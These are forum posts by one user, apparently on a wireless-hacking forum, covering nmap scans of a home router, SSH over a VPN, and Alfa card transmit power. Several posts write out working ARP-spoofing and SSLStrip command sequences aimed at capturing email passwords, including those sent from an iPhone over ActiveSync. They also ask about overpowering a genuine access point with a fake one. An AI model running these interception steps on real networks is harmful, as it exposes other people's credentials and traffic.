michael_kent123

Well, yes, but they would have to know the password. When I SSH to the VPN IP, it asks me for my password. Unless the password to my system is obvious, I don't see a problem. Or am I too naive?

I will check out the video over the weekend. One more thing that I kind of but not completely understand. I have SSH installed on my computer. If I ssh to my IP address provided by my ISP then the connection fails. However, if I connect to my VPN and then ssh to the VPN IP, I get a connection. I can login to my system using the password I use to login to my computer. I'm assuming that's how SSH is supposed to work (it's as if I was contacting my IP from a remote system) and the VPN has allowed its users to SSH to their home computers via the VPN IP. Does that make sense? Are there any security implications? Many thanks!

Thanks for the information - I've done some more research as you suggested. I scanned my external IP from inside my LAN: Not shown: 997 closed ports PORT STATE SERVICE 23/tcp open telnet # 1900/tcp open upnp # Upnp is turned off on the router so I don't know why this is open. 40001/tcp open unknown # This is the way I connect to the router 192.168.1.1:40001 I scanned my external IP from my VPN IP: Note: Host seems down. If it is really up, but blocking our ping probes, try -PN Nmap done: 1 IP address (0 hosts up) scanned in 3.21 seconds I typed my external IP:40001 into the browser and, when using the VPN, it timed out. When I typed my external IP:port in (without using a VPN) it brought up the login screen. So my impression is that the router is not accessible from the internet.

I have a TP-Link router and recently ran an nmap scan on it from inside my network. I'm not too worried about the results as I have turned remote admin off so the router is inaccessible from the internet. I am using the Ubuntu OS. Nonetheless, there are a few things I do not understand. Here are my results: 23/tcp open telnet 1900/tcp open upnp 2000/tcp open cisco-sccp 2001/tcp open dc 9000/tcp open cslistener Telnet makes sense; it's a way to connect to the router. Upnp I understand but, even though I've disabled it in the admin panel, it still shows "open". Maybe nmap is supposed to show it as open, even though it's closed from the perspective of the router. I don't know. Sccp (https://en.wikipedia.org/wiki/Skinny_Call_Control_Protocol) is a Cisco protocol which makes no sense to me as I don't have a Cisco router unless TP-Link has paid to use this proprietary protocol. Dc seems very mysterious and no-one seems to know what it is. Cslistener (http://brianoneill.blogspot.com/2012/02/cslistener-on-mac-osx-on-port-9000.html) maybe the Checkpoint firewall which I have not installed. More generally, is there a way to run a netstat like command on the router IP. I can telnet to it but I can't run commands like netstat to check what is happening on these ports from the router's perspective. Any ideas?

I finally tried tcpick but had no success. Here is what I did. Terminal 1: echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 arpspoof -i wlan0 192.168.1.1 [router IP] Terminal 2: sslstrip -l 10000 -k Terminal 3: sudo tcpick -i wlan0 -bPS -C "port 443" Terminal 4: sudo tcpick -i wlan0 -bPC -C "port 443" I then sent an e-mail from a different device to a Hotmail address which was setup on my iPhone with ActiveSync. Tcpick showed HTTPS connections to Microsoft but did not collect any username:password combinations (neither did sslstrip.log). The tcpick server shows content like: ...r......Y.t~swj......t..J...$.#. .k.g.9.3...=.<.5./...&.%.......*.)..... ...............C.........bay405-m.hotmail.com. ................. ..........3t.. ....f...ba..L!g..Q*..fA '. +........7............x..[q..Z.J...}K........ \...%S2F..q.*X..._.T}v{......|FE.. ...... The tcpick client just showed connections to Microsoft's IP addresses. For example: SYN-SENT 192.168.1.10:51999 > 207.46.11.152:https SYN-SENT 192.168.1.10:53999 > 207.46.11.152:https RESET 192.168.1.10:51999 > 207.46.11.152:https RESET 192.168.1.10:51999 > 207.46.11.152:https I also tried using tcpick -i wlan0 -bPC -C "port 80" and tcpick -i wlan0 -bPS -C "port 80" (as i8igmac suggested). However, no data was shown. Just IP addresses. Any ideas? Thanks.

Sourceforge is down atm but I'll look into this. How does it sniff / intercept / overcome SSL communications?

Does anyone know about Microsoft ActiveSync? Link: https://en.wikipedia.org/wiki/Exchange_ActiveSync Basically, it is the way in which iPhone users setup their Hotmail / Outlook account. You just enter the e-mail and password and ActiveSync checks that the information is correct. You don't need to enter the POP or IMAP or SMTP details. Now, ActiveSync uses port 443 to transmit data. I thought that the username and password could be intercepted and recorded with SSL Strip. This is because the data is transmitted to the Microsoft server using HTTPS which is exactly what SSL Strip compromises when used on websites. Here is how I setup SSL Strip. I know for a fact that this works as I tested it by logging in to e-mail sites on the iPhone. echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 arpspoof -i wlan1 gateway_ip sslstrip -l 10000 -k I then sent an e-mail from a different device to the iPhone. I used Wireshark which showed that my iPhone's IP transmitted some HTTPS traffic. I assume that it logged into Microsoft servers to access the message. At this point, I am guessing that the username and password was sent to allow me to read the message. Wireshark shows a DNS request to outlook.office365.com and the iPhone's IP contacts an IP in the range 207.46.0.0 - 207.46.255.255 which is owned by Microsoft. This is HTTPS (over TCP) and TLSv1.2 protocols. There is also a transmission to 132.245.0.0 - 132.245.255.255 which is Microsoft using IMAPS. However, when I checked the SSL Strip log, nothing was recorded. Obviously, using ActiveSync is not the same as logging into a HTTPS website. But ActiveSync does use HTTPS so I thought that SSL Strip might work. Clearly I was wrong. Can anyone comment on this? Is there a way to acquire the password from an iPhone when the e-mail account is setup with ActiveSync? As more and more people move from computers to phones, I would have thought this would be an increasingly important attack vector.

On a related note, I wonder if you know anything about Microsoft Active Sync. I set up a Hotmail account on my iPhone. To connect to the server, Microsoft apparently uses HTTPS on port 443. See, for example, http://www.altn.com/Support/FAQ/FAQResults/?Number=KBA-02281 I used arpspoof and SSLStrip in the normal way (iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000). I then sent an e-mail from my Desktop to my Hotmail account on my iPhone. The phone downloaded the message. However, when I checked the SSLStrip log, nothing showed. When, on the iPhone, I login to a webmail account (port 443) the username:password does show in my log. I'm wondering if there is a way to intercept the username:password between Hotmail on the iPhone using SSLStrip. Any ideas? Thanks!

Yes. My impression is that, with the Alfa, monitor mode is promiscious mode. It's just a question of terminology.

To use SSL Strip: echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 Why is the destination port 80 since we want to redirect HTTPS traffic. Shouldn't it be port 443? Let's say I want to intercept secure POP which uses port 995. Can I just do: iptables -t nat -A PREROUTING -p tcp --destination-port 995 -j REDIRECT --to-port 10000 Or should it be port 110 (POP) considering that HTTPS apparently uses port 80 (not 443)?

Promiscuous mode - ability to see packets on the wifi network you are connected to that are not directed to your MAC. Monitor mode - ability to see packets on wifi networks to which you are not connected but that your NIC can sniff. However, since modern networks are switches rather than hubs, promiscuous mode no longer really exists. Therefore, am I correct when I say that: Monitor mode is like promiscuous mode for the network you are connected to plus you can also view nearby networks. So, if I am on SSID "Hello" and my friend is on "Hello" and he sends a non-SSL username:password to his e-mail provider, and I am in monitor mode, then I can view that password in Wireshark. Is that correct? Thanks!

The other issue I wanted to ask is about increasing power via antennas. I know nothing about antenna theory. I have a 9 dBi antenna for the Alfa. What is the most powerful indoor antenna I can get for the Alfa (i.e. not having to attach it to the side of a house). Does the antenna affect only tx power or also the ability to receive better?

Is there any reason therefore not to increase the tx power to 30? It seems to only do good things. More specifically, if one created a "soft" or fake AP, a higher tx power would presumably overcome the "real" signals from the genuine AP?

Thanks - this is a helpful explanation. There is a thread in the Pineapple section on the best Alfa for Pineapple. I am wondering what the best Alfa is for those of us who want to use it for arpspoofing, packet injection, etc. In terms of tx power, a poster seems to be suggesting that one Alfa model can provide 2 dBi. I don't understand this if you can only alter the tx power to 30 (using iw reg set BO). Thanks again!

I was recently watching a video by Vivek Ramachandram on how to increase the tx power of the Alfa card. Question: what is the benefit of this? Does it allow the Alfa to "see" networks that are further away? Does it allow for packet injection over a further distance? Does it give a benefit for arpspoofing e.g. being able to transmit the fake MAC of the router over a greater distance? Can someone please articluate the benefits of tx power 30 over, say, tx power 20.